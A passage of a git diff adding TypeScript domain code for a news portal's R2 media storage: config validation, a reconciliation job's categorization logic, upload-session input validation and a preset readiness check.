+    accessKeyId: env.NEWS_MEDIA_R2_ACCESS_KEY_ID ?? "",
+    secretAccessKey: env.NEWS_MEDIA_R2_SECRET_ACCESS_KEY ?? "",
+    bucket: env.NEWS_MEDIA_R2_BUCKET ?? "",
+    publicBaseUrl: env.NEWS_MEDIA_R2_PUBLIC_BASE_URL ?? "",
+    presignedUploadTtlSeconds:
+      parsePositiveInt(env.NEWS_MEDIA_R2_PRESIGNED_UPLOAD_TTL_SECONDS) ??
+      NEWS_MEDIA_R2_DEFAULTS.presignedUploadTtlSeconds,
+    maxUploadBytes:
+      parsePositiveInt(env.NEWS_MEDIA_R2_MAX_UPLOAD_BYTES) ??
+      NEWS_MEDIA_R2_DEFAULTS.maxUploadBytes,
+    allowedMimeTypes: parseMimeList(env.NEWS_MEDIA_R2_ALLOWED_MIME_TYPES),
+    pendingTtlMinutes:
+      parsePositiveInt(env.NEWS_MEDIA_R2_PENDING_TTL_MINUTES) ??
+      NEWS_MEDIA_R2_DEFAULTS.pendingTtlMinutes,
+    orphanGraceDays:
+      parsePositiveInt(env.NEWS_MEDIA_R2_ORPHAN_GRACE_DAYS) ??
+      NEWS_MEDIA_R2_DEFAULTS.orphanGraceDays
+  };
+}
+
+export function isNewsMediaR2Enabled(
+  env: NodeJS.ProcessEnv = process.env
+): boolean {
+  return resolveNewsMediaR2Config(env).enabled;
+}
+
+/**
+ * Required keys missing/empty when `NEWS_MEDIA_R2_ENABLED=true`. Empty
+ * array when disabled (nothing required) or fully configured.
+ */
+export function findMissingNewsMediaR2Vars(
+  env: NodeJS.ProcessEnv = process.env
+): string[] {
+  if (env.NEWS_MEDIA_R2_ENABLED !== "true") return [];
+
+  return NEWS_MEDIA_R2_REQUIRED_WHEN_ENABLED.filter(
+    (name) => !isSet(env[name])
+  );
+}
+
+/**
+ * Keputusan kunci #1 (`.claude/skills/awcms-news-portal/SKILL.md`,
+ * architecture doc §2): news-media R2 bucket/credentials MUST be separate
+ * from `sync-storage`'s own `R2_*` vars (Issue #436). Compares whichever
+ * of the two pairs is actually set — an unset `sync-storage` R2 var never
+ * produces a false "collision" (both sides empty-string would otherwise
+ * look "equal").
+ */
+export type NewsMediaR2SeparationViolation =
+  | "bucket_shared_with_sync_r2"
+  | "access_key_id_shared_with_sync_r2"
+  | "secret_access_key_shared_with_sync_r2";
+
+export function findNewsMediaR2SeparationViolations(
+  env: NodeJS.ProcessEnv = process.env
+): NewsMediaR2SeparationViolation[] {
+  const violations: NewsMediaR2SeparationViolation[] = [];
+
+  const newsBucket = env.NEWS_MEDIA_R2_BUCKET;
+  const syncBucket = env.R2_BUCKET;
+  if (isSet(newsBucket) && isSet(syncBucket) && newsBucket === syncBucket) {
+    violations.push("bucket_shared_with_sync_r2");
+  }
+
+  const newsAccessKeyId = env.NEWS_MEDIA_R2_ACCESS_KEY_ID;
+  const syncAccessKeyId = env.R2_ACCESS_KEY_ID;
+  if (
+    isSet(newsAccessKeyId) &&
+    isSet(syncAccessKeyId) &&
+    newsAccessKeyId === syncAccessKeyId
+  ) {
+    violations.push("access_key_id_shared_with_sync_r2");
+  }
+
+  const newsSecretAccessKey = env.NEWS_MEDIA_R2_SECRET_ACCESS_KEY;
+  const syncSecretAccessKey = env.R2_SECRET_ACCESS_KEY;
+  if (
+    isSet(newsSecretAccessKey) &&
+    isSet(syncSecretAccessKey) &&
+    newsSecretAccessKey === syncSecretAccessKey
+  ) {
+    violations.push("secret_access_key_shared_with_sync_r2");
+  }
+
+  return violations;
+}
+
+/** `true` when the configured allow-list contains the disallowed-by-default SVG MIME type. */
+export function allowsSvgMimeType(
+  env: NodeJS.ProcessEnv = process.env
+): boolean {
+  return resolveNewsMediaR2Config(env).allowedMimeTypes.includes(
+    NEWS_MEDIA_R2_DISALLOWED_MIME_TYPE_DEFAULT
+  );
+}
+
+/**
+ * Allow-list entries outside `NEWS_MEDIA_R2_KNOWN_MIME_TYPES` (Issue #635)
+ * — misconfigured/unsafe/non-image entries the MIME sniffer could never
+ * accept regardless. Empty when disabled or fully within the known set.
+ */
+export function findUnknownNewsMediaR2MimeTypes(
+  env: NodeJS.ProcessEnv = process.env
+): string[] {
+  if (env.NEWS_MEDIA_R2_ENABLED !== "true") return [];
+
+  const known: readonly string[] = NEWS_MEDIA_R2_KNOWN_MIME_TYPES;
+
+  return resolveNewsMediaR2Config(env).allowedMimeTypes.filter(
+    (mimeType) => !known.includes(mimeType)
+  );
+}
+
+/**
+ * `true` when `NEWS_MEDIA_R2_PRESIGNED_UPLOAD_TTL_SECONDS` exceeds
+ * `NEWS_MEDIA_R2_MAX_PRESIGNED_UPLOAD_TTL_SECONDS` (Issue #635). `false`
+ * when disabled or unset (falls back to the safe default).
+ */
+export function isPresignedUploadTtlTooLong(
+  env: NodeJS.ProcessEnv = process.env
+): boolean {
+  if (env.NEWS_MEDIA_R2_ENABLED !== "true") return false;
+
+  return (
+    resolveNewsMediaR2Config(env).presignedUploadTtlSeconds >
+    NEWS_MEDIA_R2_MAX_PRESIGNED_UPLOAD_TTL_SECONDS
+  );
+}
+
+/**
+ * `true` when `NEWS_MEDIA_R2_ORPHAN_GRACE_DAYS` is set below
+ * `NEWS_MEDIA_R2_MIN_ORPHAN_GRACE_DAYS` (Issue #690, `r2-backup-lifecycle.md`
+ * §3's "minimum 30 hari"). `false` when disabled or unset (falls back to the
+ * safe default, which already equals the floor).
+ */
+export function isOrphanGraceTooShort(
+  env: NodeJS.ProcessEnv = process.env
+): boolean {
+  if (env.NEWS_MEDIA_R2_ENABLED !== "true") return false;
+
+  return (
+    resolveNewsMediaR2Config(env).orphanGraceDays <
+    NEWS_MEDIA_R2_MIN_ORPHAN_GRACE_DAYS
+  );
+}
+
+/**
+ * A trailing "." makes a hostname a fully-qualified DNS name that
+ * resolves IDENTICALLY to the same name without the dot (DNS root label —
+ * `abc.r2.dev.` and `abc.r2.dev` are the same host to any resolver/
+ * browser), but `new URL(...).hostname` preserves it literally, which
+ * would otherwise let a one-character trailing-dot variant silently slip
+ * past both the `.r2.dev` suffix check and the exact loopback-string
+ * checks below (reviewer + security-auditor finding, PR #665 re-review).
+ * Normalize it away before either check runs.
+ */
+function stripTrailingDot(hostname: string): string {
+  return hostname.endsWith(".") ? hostname.slice(0, -1) : hostname;
+}
+
+/**
+ * Hostnames Cloudflare R2 assigns automatically for a bucket that has NO
+ * custom domain mapped — architecture doc §11: "bukan URL `r2.dev` bawaan
+ * (yang tidak stabil untuk produksi dan tidak mendukung caching/branding
+ * kustom)". Matches the exact `<bucket-hash>.r2.dev` pattern R2 issues,
+ * not merely "contains r2.dev" (avoids a false positive against a
+ * legitimate custom domain that happens to contain that substring
+ * elsewhere in its path).
+ */
+function isR2DevHost(hostname: string): boolean {
+  return /\.r2\.dev$/i.test(stripTrailingDot(hostname));
+}
+
+/**
+ * Loopback hosts — never a legitimate production public media domain.
+ * Covers IPv4 (`127.0.0.1`, unbracketed), IPv6 (`::1`, both bracketed
+ * `[::1]` — the form `new URL(...).hostname` actually returns for an IPv6
+ * host — and unbracketed), `0.0.0.0` (binds-to-all-interfaces, not a
+ * routable address either), and `localhost`, all case-insensitively
+ * (IPv6 literals are lowercased by `URL` already, but `localhost` is not).
+ */
+function isLoopbackHost(hostname: string): boolean {
+  const normalized = stripTrailingDot(hostname).toLowerCase();
+
+  return (
+    normalized === "localhost" ||
+    normalized === "127.0.0.1" ||
+    normalized === "0.0.0.0" ||
+    normalized === "::1" ||
+    normalized === "[::1]"
+  );
+}
+
+export type NewsMediaR2PublicBaseUrlProductionUnsafeReason =
+  "r2_dev_default_domain" | "loopback_host" | "unparseable_url";
+
+/**
+ * `null` when the URL is safe for production use (or n/a — see callers);
+ * otherwise the specific reason it is NOT safe (Issue #635, architecture
+ * doc §11). Pure URL-hostname inspection — does not itself decide whether
+ * "production" applies; callers (`security-readiness.ts`) gate that on
+ * `APP_ENV === "production"`.
+ */
+export function findNewsMediaR2PublicBaseUrlProductionUnsafeReason(
+  publicBaseUrl: string
+): NewsMediaR2PublicBaseUrlProductionUnsafeReason | null {
+  let hostname: string;
+
+  try {
+    hostname = new URL(publicBaseUrl).hostname;
+  } catch {
+    return "unparseable_url";
+  }
+
+  if (isLoopbackHost(hostname)) return "loopback_host";
+  if (isR2DevHost(hostname)) return "r2_dev_default_domain";
+
+  return null;
+}

--- a/src/modules/news-portal/domain/news-media-reconciliation-categorization.ts
+++ b/src/modules/news-portal/domain/news-media-reconciliation-categorization.ts
@@ -1,0 +1,277 @@
+/**
+ * Pure categorization logic for the R2 media lifecycle cleanup &
+ * reconciliation job (Issue #690, epic #679 platform-hardening — "runtime/
+ * worker hardening" wave, following #691/#689/#694/#695/#687/#697). No I/O
+ * at all (no DB, no R2, no `process.env`) — `scripts/news-media-r2-
+ * reconcile.ts`'s application-layer orchestration
+ * (`news-media-reconciliation.ts`) is what gathers the inputs below (a
+ * DB row snapshot via `news-media-object-directory.ts`'s fetch helpers, and
+ * an R2 bucket listing via `news-media-r2-client.ts`'s paginated
+ * `listObjects`) and calls this module to decide what belongs in which
+ * category. Kept pure specifically so every category boundary (the exact
+ * question this job's acceptance criteria/tests care about) can be tested
+ * deterministically against synthetic inputs, without a real Postgres/R2
+ * fake server — same "decision logic separated from I/O" convention as
+ * `news-media-finalize-decision.ts`.
+ *
+ * ## The five categories
+ *
+ * - **healthy** — an `uploaded`/`verified`/`attached` row whose object key
+ *   IS present in the R2 listing. No action.
+ * - **orphanInDb** — an `uploaded`/`verified`/`attached` row whose object
+ *   key is MISSING from the R2 listing (the DB thinks the object should
+ *   exist; R2 disagrees). REPORT-ONLY, forever — this job never mutates
+ *   these rows. In particular an `attached` row may be actively referenced
+ *   by published content; auto-transitioning it (e.g. to `failed`) without
+ *   a human decision is exactly the kind of silent, surprising mutation
+ *   this job must never perform. Remediation (re-upload, unlink, manual
+ *   investigation) is an operator decision — see
+ *   `docs/awcms-mini/news-portal/r2-backup-lifecycle.md`'s operator SOP
+ *   section.
+ * - **expiredPending** — a `pending_upload`/`uploaded`/`failed` row, not yet
+ *   soft-deleted, older than `pendingTtlMinutes`
+ *   (`NEWS_MEDIA_R2_PENDING_TTL_MINUTES`). Eligible for R2-object-delete +
+ *   DB hard-delete (`r2-backup-lifecycle.md` §2: a row that never became a
+ *   real resource). `failed` rows are included alongside
+ *   `pending_upload`/`uploaded` so a previous run's R2-delete failure
+ *   (provider outage) is retried on the next run — see this module's own
+ *   idempotency note below.
+ * - **staleOrphaned** — a `status = 'orphaned'` row, not yet soft-deleted,
+ *   whose `orphanedAt` is older than `orphanGraceDays`
+ *   (`NEWS_MEDIA_R2_ORPHAN_GRACE_DAYS`). Eligible for R2-object-delete +
+ *   DB soft-delete (`r2-backup-lifecycle.md` §3's retention table).
+ * - **orphanInR2** — an R2 object whose key has NO matching DB row AT ALL
+ *   (any status, any `deletedAt`) for this tenant. Eligible for physical R2
+ *   deletion once its OWN age (R2's reported `lastModified`, the only
+ *   timestamp available — there is no DB row) exceeds `orphanGraceDays`.
+ *   This category only exists because `purgeNewsMediaObject` (hard delete)
+ *   does not itself delete the R2 object — a known, accepted gap this job
+ *   closes asynchronously rather than by changing that endpoint's
+ *   transaction semantics (ADR-0006: R2 calls never happen inside a DB
+ *   transaction, and purge's own request/response cycle is not the place
+ *   to add a synchronous cross-provider call). An object without a
+ *   `lastModified` (should not happen in practice) is conservatively never
+ *   included — this job would rather leave a truly-ancient untracked object
+ *   alone than mis-delete based on missing metadata.
+ *
+ * ## Idempotency
+ *
+ * Categorizing the SAME snapshot twice always produces the SAME five lists
+ * — this function has no side effects and no hidden state. Real-world
+ * idempotency across ACTUAL job runs (`bun run news-media:reconcile` twice
+ * in a row doing nothing the second time) additionally depends on the
+ * application layer's mutations actually converging (deleting a row/object
+ * removes it from the NEXT run's candidate snapshot) — see
+ * `news-media-reconciliation.ts`'s own header for that half of the
+ * guarantee.
+ *
+ * ## The race-condition guarantee (critical acceptance criterion)
+ *
+ * This module's OWN output is never itself unsafe to act on for
+ * `orphanInR2` MERELY because it's a point-in-time snapshot — the
+ * application layer (not this file) is responsible for re-verifying each
+ * `orphanInR2` candidate immediately before deleting it
+ * (`objectKeyExistsForTenant`, a targeted point lookup, NOT this bulk
+ * categorization) to close the window between "when this snapshot was
+ * taken" and "when the delete actually happens". This module cannot, by
+ * itself, guarantee that — it only guarantees that a snapshot which
+ * genuinely had no matching DB row at scan time is correctly categorized as
+ * `orphanInR2`, nothing about what happens microseconds later.
+ */
+
+export type NewsMediaReconciliationDbRow = {
+  id: string;
+  objectKey: string;
+  status:
+    | "pending_upload"
+    | "uploaded"
+    | "verified"
+    | "attached"
+    | "orphaned"
+    | "deleted"
+    | "failed";
+  createdAt: Date;
+  orphanedAt: Date | null;
+  deletedAt: Date | null;
+};
+
+export type NewsMediaReconciliationR2Object = {
+  key: string;
+  sizeBytes?: number;
+  /** ISO 8601 string, as reported by R2's own `LastModified` field. */
+  lastModified?: string;
+};
+
+export type NewsMediaReconciliationInput = {
+  /** Every non-purged DB row for one tenant (any status, including already-soft-deleted — needed so `orphanInR2` can tell "genuinely no row" apart from "there IS a row, just not one of the expected-present statuses"). */
+  dbRows: NewsMediaReconciliationDbRow[];
+  /** The full, already-paginated-and-merged R2 listing for this tenant's own key prefix. */
+  r2Objects: NewsMediaReconciliationR2Object[];
+  now: Date;
+  pendingTtlMinutes: number;
+  orphanGraceDays: number;
+};
+
+export type NewsMediaHealthyEntry = { id: string; objectKey: string };
+
+export type NewsMediaOrphanInDbEntry = {
+  id: string;
+  objectKey: string;
+  status: NewsMediaReconciliationDbRow["status"];
+  ageDays: number;
+};
+
+export type NewsMediaExpiredPendingEntry = {
+  id: string;
+  objectKey: string;
+  status: NewsMediaReconciliationDbRow["status"];
+  ageMinutes: number;
+};
+
+export type NewsMediaStaleOrphanedEntry = {
+  id: string;
+  objectKey: string;
+  ageDays: number;
+};
+
+export type NewsMediaOrphanInR2Entry = {
+  objectKey: string;
+  sizeBytes?: number;
+  /** `null` when the object has no usable age signal (missing/unparseable `lastModified`) — never eligible for deletion regardless of `orphanGraceDays`. */
+  ageDays: number | null;
+};
+
+export type NewsMediaReconciliationResult = {
+  healthy: NewsMediaHealthyEntry[];
+  orphanInDb: NewsMediaOrphanInDbEntry[];
+  expiredPending: NewsMediaExpiredPendingEntry[];
+  staleOrphaned: NewsMediaStaleOrphanedEntry[];
+  orphanInR2: NewsMediaOrphanInR2Entry[];
+};
+
+const EXPECTED_PRESENT_STATUSES = new Set<
+  NewsMediaReconciliationDbRow["status"]
+>(["uploaded", "verified", "attached"]);
+
+const EXPIRED_PENDING_STATUSES = new Set<
+  NewsMediaReconciliationDbRow["status"]
+>(["pending_upload", "uploaded", "failed"]);
+
+function ageInDays(from: Date, now: Date): number {
+  return Math.max(0, (now.getTime() - from.getTime()) / (24 * 60 * 60 * 1000));
+}
+
+function ageInMinutes(from: Date, now: Date): number {
+  return Math.max(0, (now.getTime() - from.getTime()) / (60 * 1000));
+}
+
+/** `null` for missing/unparseable `lastModified` — never a NaN that would silently satisfy a numeric comparison. */
+function r2ObjectAgeInDays(
+  lastModified: string | undefined,
+  now: Date
+): number | null {
+  if (!lastModified) return null;
+
+  const parsed = new Date(lastModified);
+  if (Number.isNaN(parsed.getTime())) return null;
+
+  return ageInDays(parsed, now);
+}
+
+/**
+ * Categorizes one tenant's DB rows + R2 listing snapshot into the five
+ * lifecycle categories described in this module's header. Deterministic and
+ * side-effect-free.
+ */
+export function categorizeNewsMediaReconciliation(
+  input: NewsMediaReconciliationInput
+): NewsMediaReconciliationResult {
+  const { dbRows, r2Objects, now, pendingTtlMinutes, orphanGraceDays } = input;
+
+  const r2KeySet = new Set(r2Objects.map((object) => object.key));
+  const dbKeySet = new Set(dbRows.map((row) => row.objectKey));
+
+  const pendingCutoff = new Date(now.getTime() - pendingTtlMinutes * 60_000);
+  const orphanCutoff = new Date(
+    now.getTime() - orphanGraceDays * 24 * 60 * 60 * 1000
+  );
+
+  const healthy: NewsMediaHealthyEntry[] = [];
+  const orphanInDb: NewsMediaOrphanInDbEntry[] = [];
+  const expiredPending: NewsMediaExpiredPendingEntry[] = [];
+  const staleOrphaned: NewsMediaStaleOrphanedEntry[] = [];
+
+  for (const row of dbRows) {
+    // Security-auditor Medium finding on PR #718: `"uploaded"` is a member
+    // of BOTH `EXPECTED_PRESENT_STATUSES` (healthy/orphanInDb) and
+    // `EXPIRED_PENDING_STATUSES` (expiredPending) — without this guard, a
+    // single `status='uploaded'` row past `pendingTtlMinutes` was counted
+    // in BOTH lists at once: reported as "healthy: no action" (or
+    // "orphanInDb: never mutated") in the same run this job actually
+    // claims it into `expiredPending` and deletes it, contradicting this
+    // module's own documented invariant for those two categories. Compute
+    // the expiredPending membership once and gate the first block on NOT
+    // being expiredPending, so every row lands in exactly one category.
+    const isExpiredPending =
+      row.deletedAt === null &&
+      EXPIRED_PENDING_STATUSES.has(row.status) &&
+      row.createdAt < pendingCutoff;
+
+    if (
+      row.deletedAt === null &&
+      !isExpiredPending &&
+      EXPECTED_PRESENT_STATUSES.has(row.status)
+    ) {
+      if (r2KeySet.has(row.objectKey)) {
+        healthy.push({ id: row.id, objectKey: row.objectKey });
+      } else {
+        orphanInDb.push({
+          id: row.id,
+          objectKey: row.objectKey,
+          status: row.status,
+          ageDays: ageInDays(row.createdAt, now)
+        });
+      }
+    }
+
+    if (isExpiredPending) {
+      expiredPending.push({
+        id: row.id,
+        objectKey: row.objectKey,
+        status: row.status,
+        ageMinutes: ageInMinutes(row.createdAt, now)
+      });
+    }
+
+    if (
+      row.deletedAt === null &&
+      row.status === "orphaned" &&
+      row.orphanedAt !== null &&
+      row.orphanedAt < orphanCutoff
+    ) {
+      staleOrphaned.push({
+        id: row.id,
+        objectKey: row.objectKey,
+        ageDays: ageInDays(row.orphanedAt, now)
+      });
+    }
+  }
+
+  const orphanInR2: NewsMediaOrphanInR2Entry[] = r2Objects
+    .filter((object) => !dbKeySet.has(object.key))
+    .map((object) => ({
+      objectKey: object.key,
+      sizeBytes: object.sizeBytes,
+      ageDays: r2ObjectAgeInDays(object.lastModified, now)
+    }));
+
+  return { healthy, orphanInDb, expiredPending, staleOrphaned, orphanInR2 };
+}
+
+/** `true` iff `entry.ageDays` is known AND at least `orphanGraceDays` — the deletion-eligibility gate for `orphanInR2` entries (application layer still re-verifies via `objectKeyExistsForTenant` immediately before acting). */
+export function isOrphanInR2EligibleForDeletion(
+  entry: NewsMediaOrphanInR2Entry,
+  orphanGraceDays: number
+): boolean {
+  return entry.ageDays !== null && entry.ageDays >= orphanGraceDays;
+}

--- a/src/modules/news-portal/domain/news-media-upload-session-validation.ts
+++ b/src/modules/news-portal/domain/news-media-upload-session-validation.ts
@@ -1,0 +1,190 @@
+/**
+ * Request-shape validation for the presigned upload session endpoints
+ * (Issue #634, epic `news_portal`). Pure — no DB/network access. Follows
+ * `blog-content/domain/blog-post-validation.ts`'s
+ * `{ valid: true; value } | { valid: false; errors }` convention.
+ *
+ * `r2-upload-sop.md` §2 step 1 validates SHAPE ONLY at create time (no bytes
+ * exist yet to check content against) — `mimeType` must be in the
+ * deployment's configured allow-list and `byteSize` must not exceed
+ * `NEWS_MEDIA_R2_MAX_UPLOAD_BYTES`. Neither is persisted verbatim: the
+ * object key's real extension is derived from the validated `mimeType`
+ * (`news-media-object-key.ts`), and the real `size_bytes` column is only
+ * ever populated later from R2's own `HEAD` response at finalize time
+ * (`markNewsMediaObjectUploaded`) — the client's claimed `byteSize` here is
+ * only an early, cheap rejection of an obviously-oversized request before
+ * any presigned URL is even generated.
+ */
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+const MAX_TEXT_FIELD_LENGTH = 500;
+
+export type CreateNewsMediaUploadSessionInput = {
+  mimeType: string;
+  byteSize: number;
+  originalFilename: string | null;
+  altText: string | null;
+  caption: string | null;
+};
+
+export type CreateNewsMediaUploadSessionValidationResult =
+  | { valid: true; value: CreateNewsMediaUploadSessionInput }
+  | { valid: false; errors: ValidationError[] };
+
+function validateOptionalText(
+  raw: unknown,
+  field: string,
+  errors: ValidationError[]
+): string | null {
+  if (raw === undefined || raw === null) return null;
+
+  if (typeof raw !== "string") {
+    errors.push({ field, message: `${field} must be a string.` });
+    return null;
+  }
+
+  const trimmed = raw.trim();
+
+  if (trimmed.length === 0) return null;
+
+  if (trimmed.length > MAX_TEXT_FIELD_LENGTH) {
+    errors.push({
+      field,
+      message: `${field} must be at most ${MAX_TEXT_FIELD_LENGTH} characters.`
+    });
+    return null;
+  }
+
+  return trimmed;
+}
+
+export function validateCreateNewsMediaUploadSessionInput(
+  raw: unknown,
+  allowedMimeTypes: string[],
+  maxUploadBytes: number
+): CreateNewsMediaUploadSessionValidationResult {
+  const errors: ValidationError[] = [];
+
+  if (!raw || typeof raw !== "object") {
+    return {
+      valid: false,
+      errors: [{ field: "body", message: "Request body must be an object." }]
+    };
+  }
+
+  const body = raw as Record<string, unknown>;
+
+  let mimeType = "";
+  if (typeof body.mimeType !== "string" || body.mimeType.trim().length === 0) {
+    errors.push({ field: "mimeType", message: "mimeType is required." });
+  } else {
+    mimeType = body.mimeType.toLowerCase().trim();
+    if (!allowedMimeTypes.includes(mimeType)) {
+      errors.push({
+        field: "mimeType",
+        message: `mimeType must be one of: ${allowedMimeTypes.join(", ")}.`
+      });
+    }
+  }
+
+  let byteSize = 0;
+  if (
+    typeof body.byteSize !== "number" ||
+    !Number.isFinite(body.byteSize) ||
+    !Number.isInteger(body.byteSize) ||
+    body.byteSize <= 0
+  ) {
+    errors.push({
+      field: "byteSize",
+      message: "byteSize must be a positive integer."
+    });
+  } else {
+    byteSize = body.byteSize;
+    if (byteSize > maxUploadBytes) {
+      errors.push({
+        field: "byteSize",
+        message: `byteSize must not exceed ${maxUploadBytes} bytes.`
+      });
+    }
+  }
+
+  const originalFilename = validateOptionalText(
+    body.originalFilename,
+    "originalFilename",
+    errors
+  );
+  const altText = validateOptionalText(body.altText, "altText", errors);
+  const caption = validateOptionalText(body.caption, "caption", errors);
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return {
+    valid: true,
+    value: { mimeType, byteSize, originalFilename, altText, caption }
+  };
+}
+
+const SHA256_HEX_PATTERN = /^[0-9a-f]{64}$/i;
+
+export type FinalizeNewsMediaUploadSessionInput = {
+  checksumSha256: string | null;
+};
+
+export type FinalizeNewsMediaUploadSessionValidationResult =
+  | { valid: true; value: FinalizeNewsMediaUploadSessionInput }
+  | { valid: false; errors: ValidationError[] };
+
+/**
+ * `checksumSha256` is optional (issue's own acceptance criteria: "Optional
+ * checksum SHA-256") — when present it must be a well-formed SHA-256 hex
+ * digest. Per §9, a match/mismatch here only ever detects transport
+ * corruption; it is never sufficient on its own to accept an upload (see
+ * `news-media-finalize-decision.ts`).
+ */
+export function validateFinalizeNewsMediaUploadSessionInput(
+  raw: unknown
+): FinalizeNewsMediaUploadSessionValidationResult {
+  // An absent/empty body is valid — checksum is optional.
+  if (raw === null || raw === undefined) {
+    return { valid: true, value: { checksumSha256: null } };
+  }
+
+  if (typeof raw !== "object") {
+    return {
+      valid: false,
+      errors: [{ field: "body", message: "Request body must be an object." }]
+    };
+  }
+
+  const body = raw as Record<string, unknown>;
+
+  if (body.checksumSha256 === undefined || body.checksumSha256 === null) {
+    return { valid: true, value: { checksumSha256: null } };
+  }
+
+  if (
+    typeof body.checksumSha256 !== "string" ||
+    !SHA256_HEX_PATTERN.test(body.checksumSha256)
+  ) {
+    return {
+      valid: false,
+      errors: [
+        {
+          field: "checksumSha256",
+          message: "checksumSha256 must be a 64-character hex SHA-256 digest."
+        }
+      ]
+    };
+  }
+
+  return {
+    valid: true,
+    value: { checksumSha256: body.checksumSha256.toLowerCase() }
+  };
+}

--- a/src/modules/news-portal/domain/news-portal-preset-readiness.ts
+++ b/src/modules/news-portal/domain/news-portal-preset-readiness.ts
@@ -1,0 +1,143 @@
+/**
+ * Readiness gate for the `news_portal_full_online_r2` module preset
+ * (Issue #632, epic `news_portal` #631-#642/#649). Pure — no I/O, no
+ * `process.env` reads here (same split as
+ * `visitor-analytics/domain/visitor-analytics-config.ts`).
+ *
+ * ## Naming reconciliation #1 — no new global `DEPLOYMENT_PROFILE` var
+ *
+ * Issue #632's body illustrates `DEPLOYMENT_PROFILE=full_online` as if it
+ * were an existing/needed env var. It is neither: `grep`ing this repo
+ * finds zero references outside narrative docs
+ * (`docs/awcms-mini/deployment-profiles.md`). This repo's established
+ * config pattern is independent, per-feature flags (`R2_ENABLED`,
+ * `EMAIL_ENABLED`, `VISITOR_ANALYTICS_ENABLED`, ...) — never one central
+ * deployment-mode enum every module has to branch on. Introducing a new
+ * global master switch here would be the first of its kind and would
+ * duplicate/compete with those flags instead of composing with them.
+ *
+ * Instead, "full-online" for THIS preset is expressed as two new,
+ * narrowly-scoped vars (`NEWS_PORTAL_ENABLED` and `NEWS_PORTAL_PROFILE`,
+ * this module's own master switch + profile selector) combined with the
+ * already-existing `NEWS_MEDIA_R2_ENABLED` (news-media-r2-config.ts). Three
+ * independent flags that all have to agree, not one central enum.
+ *
+ * ## Naming reconciliation #2 — no new `BLOG_PUBLIC_ROUTE_MODE` var
+ *
+ * Issue #632's body also lists `BLOG_PUBLIC_ROUTE_MODE=domain_default`.
+ * That string is not a new concept — it is the EXISTING
+ * `blog_content` module setting `publicRouteMode`
+ * (`blog-content/application/public-route-settings.ts`,
+ * `PUBLIC_ROUTE_MODES = ["domain_default", "disabled"]`, Issue #564),
+ * already defaulting to `"domain_default"` today for every tenant. It is a
+ * per-tenant `awcms_module_settings` value (written via
+ * `PATCH /api/v1/tenant/modules/blog_content/settings`), not an env var —
+ * introducing an env var of the same name would create two competing
+ * sources of truth for one concept. This preset recommends (documents,
+ * does not enforce via a new mechanism) that a tenant activating
+ * `news_portal_full_online_r2` leaves `blog_content`'s `publicRouteMode`
+ * at its default `"domain_default"` and sets the relevant
+ * `awcms_tenant_domains` row's existing `route_mode` column
+ * (`tenant-domain/domain/tenant-domain-validation.ts`,
+ * `canonical` | `legacy_blog`, Issue #557) to `"canonical"` via the
+ * existing tenant-domain API (#562) — two already-existing, independent
+ * mechanisms, not a third new one.
+ *
+ * `BLOG_PUBLIC_BASE_PATH` in the issue body is, similarly, just
+ * `PUBLIC_CANONICAL_BASE_PATH` (Issue #556,
+ * `blog-content/application/public-route-settings.ts`), already
+ * defaulting to `/news` — no new var needed for it either.
+ */
+import {
+  findMissingNewsMediaR2Vars,
+  findNewsMediaR2SeparationViolations,
+  isNewsMediaR2Enabled
+} from "./news-media-r2-config";
+
+export const NEWS_PORTAL_PROFILES = ["full_online_r2"] as const;
+export type NewsPortalProfile = (typeof NEWS_PORTAL_PROFILES)[number];
+
+export function isKnownNewsPortalProfile(
+  value: string | undefined
+): value is NewsPortalProfile {
+  return (NEWS_PORTAL_PROFILES as readonly string[]).includes(value ?? "");
+}
+
+export type NewsPortalPresetReadinessReason =
+  | "news_portal_disabled"
+  | "profile_not_full_online_r2"
+  | "news_media_r2_disabled"
+  | "news_media_r2_config_incomplete"
+  | "news_media_r2_shares_sync_storage_bucket_or_credentials";
+
+export type NewsPortalPresetReadinessResult = {
+  ready: boolean;
+  reasons: NewsPortalPresetReadinessReason[];
+  /** Human-readable evidence, one entry per failing/relevant check — for audit `attributes`/report output. */
+  detail: string[];
+};
+
+/**
+ * The one concrete, checkable signal this preset uses to decide "is this
+ * deployment genuinely full-online R2-only" — see reconciliation #1
+ * above. All three of `NEWS_PORTAL_ENABLED=true`,
+ * `NEWS_PORTAL_PROFILE=full_online_r2`, and `NEWS_MEDIA_R2_ENABLED=true`
+ * must hold, AND the R2 config itself must be complete and separated from
+ * `sync-storage`'s own R2 bucket/credentials (Keputusan kunci #1).
+ *
+ * Out of scope by design (see SKILL.md/architecture doc §3.3-3.4): there is
+ * no "local upload fallback enabled" flag to check here, because no such
+ * flag/code path exists anywhere in this repo — this mode has structurally
+ * no local-fallback option to disable. `tests/unit/news-portal-no-local-fallback.test.ts`
+ * guards this by asserting no such code path gets introduced later,
+ * instead of this function checking a flag that would otherwise have to be
+ * invented just to be checked.
+ */
+export function evaluateNewsPortalFullOnlineR2Readiness(
+  env: NodeJS.ProcessEnv = process.env
+): NewsPortalPresetReadinessResult {
+  const reasons: NewsPortalPresetReadinessReason[] = [];
+  const detail: string[] = [];
+
+  if (env.NEWS_PORTAL_ENABLED !== "true") {
+    reasons.push("news_portal_disabled");
+    detail.push(
+      'NEWS_PORTAL_ENABLED is not "true" — the news_portal_full_online_r2 preset requires it explicitly (opt-in, never a default).'
+    );
+  }
+
+  const profile = env.NEWS_PORTAL_PROFILE;
+  if (!isKnownNewsPortalProfile(profile)) {
+    reasons.push("profile_not_full_online_r2");
+    detail.push(
+      `NEWS_PORTAL_PROFILE must be "full_online_r2" for this preset; got ${
+        profile ? `"${profile}"` : "unset"
+      }.`
+    );
+  }
+
+  if (!isNewsMediaR2Enabled(env)) {
+    reasons.push("news_media_r2_disabled");
+    detail.push(
+      'NEWS_MEDIA_R2_ENABLED is not "true" — this preset requires the R2-only news media mode to be active (no local-storage alternative exists in this mode).'
+    );
+  } else {
+    const missing = findMissingNewsMediaR2Vars(env);
+    if (missing.length > 0) {
+      reasons.push("news_media_r2_config_incomplete");
+      detail.push(
+        `NEWS_MEDIA_R2_ENABLED=true but required var(s) missing: ${missing.join(", ")}.`
+      );
+    }
+
+    const violations = findNewsMediaR2SeparationViolations(env);
+    if (violations.length > 0) {
+      reasons.push("news_media_r2_shares_sync_storage_bucket_or_credentials");
+      detail.push(
